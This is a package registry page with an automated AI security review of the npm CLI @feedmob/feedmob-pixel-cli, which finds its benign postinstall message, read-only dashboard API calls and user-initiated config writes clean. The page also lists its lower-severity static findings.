registry  /  @feedmob/feedmob-pixel-cli  /  0.1.2

@feedmob/feedmob-pixel-cli@0.1.2

FeedMob Pixel Dashboard data query CLI

AI Security Review

scanned 1d ago · by lpm-firewall-ai

No confirmed malicious attack surface. Package is a Dashboard API CLI; install-time behavior is limited to printing guidance, while network/file actions require user-invoked CLI commands.

Static reason
One or more suspicious static signals were detected.
Trigger
npm install prints postinstall message; feedpix commands trigger API/config actions
Impact
Reads Dashboard API data and optionally writes local CLI config when requested by user.
Mechanism
user-invoked API client and optional local config writer
Rationale
Static source inspection shows package-aligned CLI behavior with no install-time mutation beyond stdout and no credential harvesting or covert exfiltration. Token use is for authenticated Dashboard API calls or explicit user-requested config storage.
Evidence
package.jsonscripts/postinstall.cjsdist/cli.jsdist/client.jsdist/config.jsdist/commands/init.jsdist/commands/records.jsdist/commands/request.jsdist/output.js
Network endpoints1
feedmob-pixel-dashboard.feedmob.com/

Decision evidence

public snapshot
AI called this Clean at 93.0% confidence as Benign with low false-positive risk.
Evidence for block
    Evidence against
    • package.json postinstall runs scripts/postinstall.cjs only; script prints setup/help text and does not write files or run commands.
    • dist/cli.js only builds commander CLI and dispatches user-invoked commands.
    • dist/client.js performs authenticated read-only GET/HEAD/fetch calls to configured Dashboard API paths and rejects absolute request paths.
    • dist/config.js reads env/config and writes ~/.feedpix/config.json only through explicit init command.
    • dist/output.js redacts bearer/token-like strings in error output.
    • No child_process, eval/vm/Function, native binary loading, persistence, or AI-agent control-surface writes found.
    Behavioral surface
    Source
    EnvironmentVarsFilesystem
    Supply chain
    HighEntropyStringsUrlStrings
    Manifest
    NoLicense
    scanned 17 file(s), 44.3 KB of source, external domains: feedmob-pixel-dashboard.feedmob.com, github.com

    Source & flagged code

    2 flagged · loading source
    package.jsonView file
    scripts.postinstall = node ./scripts/postinstall.cjs
    High
    Install Time Lifecycle Scripts

    Package defines install-time lifecycle scripts.

    package.jsonView on unpkg
    scripts.postinstall = node ./scripts/postinstall.cjs
    Medium
    Ambiguous Install Lifecycle Script

    Install-time lifecycle script is not statically allowlisted and needs review.

    package.jsonView on unpkg

    Findings

    1 High2 Medium6 Low
    HighInstall Time Lifecycle Scriptspackage.json
    MediumAmbiguous Install Lifecycle Scriptpackage.json
    MediumEnvironment Vars
    LowNon Install Lifecycle Scripts
    LowScripts Present
    LowFilesystem
    LowHigh Entropy Strings
    LowUrl Strings
    LowNo License